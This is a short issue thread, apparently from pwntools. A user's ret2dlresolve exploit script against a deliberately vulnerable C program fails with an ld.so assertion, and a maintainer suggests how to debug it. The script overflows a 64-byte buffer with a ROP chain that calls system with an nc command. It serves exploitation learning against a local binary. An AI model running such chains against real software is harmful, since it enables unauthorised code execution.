peace-maker
commented
2 months ago What's you ld.so version? You're not sending 200 bytes so your second sendline might get eaten by the first read instead of the one in the rop chain. Debug the payload to see if the rop chain is executing correctly. Check how the docs send the payload. https://docs.pwntools.com/en/latest/rop/ret2dlresolve.html
i try to user the ret2dlresolve technique but doesn't seems it works properly. very ofte i get the error message: Inconsistency detected by ld.so: dl-runtime.c: 63: _dl_fixup: Assertion `ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT' failed!
what can i do against this.
code: from pwn import elf = context.binary = ELF('./abc', checksec=True) p = elf.process() rop = ROP(elf) dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['nc 127.0.0.1 12345']) rop.raw('A' 76) rop.read(0, dlresolve.data_addr) rop.ret2dlresolve(dlresolve) p.sendline(rop.chain()) p.sendline(dlresolve.payload) p.interactive()
code:
include
void vuln(void){ char buf[64]; read(STDIN_FILENO, buf, 200); } int main(int argc, char** argv){ vuln(); }